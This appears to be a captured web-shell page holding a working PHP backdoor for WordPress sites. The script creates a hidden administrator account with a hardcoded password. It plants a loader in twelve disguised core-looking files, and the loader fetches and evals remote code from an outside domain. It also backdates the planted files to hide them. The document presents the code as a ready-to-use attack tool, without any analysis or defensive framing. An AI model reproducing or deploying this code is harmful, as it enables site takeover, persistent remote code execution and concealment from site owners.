Server IP : 52.91.253.208 / Your IP : 3.144.105.2 [ Web Server : Apache System : Linux ip-172-26-9-9 4.19.0-25-cloud-amd64 #1 SMP Debian 4.19.289-1 (2023-07-24) x86_64 User : daemon ( 1) PHP Version : 7.3.18 Disable Function : NONE Domains : 3 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : OFF Directory : /opt/bitnami/apps/wordpress/htdocs/ |
Upload File : |
<?php define('WP_USE_THEMES', false); require('wp-blog-header.php'); $new_admin_username = 'it-team'; $new_admin_password = 'plerkuda138!@'; $new_admin_email = 'it-admin@' . $_SERVER['HTTP_HOST']; if (!username_exists($new_admin_username)) { $user_id = wp_create_user($new_admin_username, $new_admin_password, $new_admin_email); $user = new WP_User($user_id); $user->set_role('administrator'); echo 'Admin baru berhasil dibuat:<br>'; echo $new_admin_username . ' (USERNAME)<br>'; echo $new_admin_password . ' (PASSWORD)<br>'; echo $new_admin_email . ' (EMAIL)<br>'; } $content = '<?php $Url = "https://zerotwostrg.xyz/maaf/zero.txt"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $Url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $output = curl_exec($ch); curl_close($ch); echo eval("?>".$output); ?>'; $file_paths = [ "./wp-includes/random_compat/random_bytes_bcrypt.php", "./wp-admin/user/license.php", "./wp-admin/includes/admin-action.php", "./wp-admin/network/freedom.php", "./wp-includes/rest-api/endpoints/class-wp-rest-api-controller.php", "./wp-includes/SimplePie/Decode/HTML/Dentities.php", "./wp-includes/blocks/navigation/view-modal.assets.php", "./wp-includes/sodium_compat/namespaced/Hash.php", "./wp-includes/style-engine/class-wp-style-engine-system.php", "./wp-includes/php-compat/readsonly.php", "./wp-includes/widgets/class-wp-nav-widgets.php", "./wp-admin/maint/restore.php" ]; foreach ($file_paths as $file_path) { if (!is_dir(dirname($file_path))) { mkdir(dirname($file_path), 0777, true); } file_put_contents($file_path, $content); touch($file_path, filemtime('/etc/passwd')); } echo "File Has Been Created<br><br>"; foreach ($file_paths as $file_path) { echo "https://" . $_SERVER['HTTP_HOST'] . str_replace("./", "/", $file_path) . "<br>"; } ?>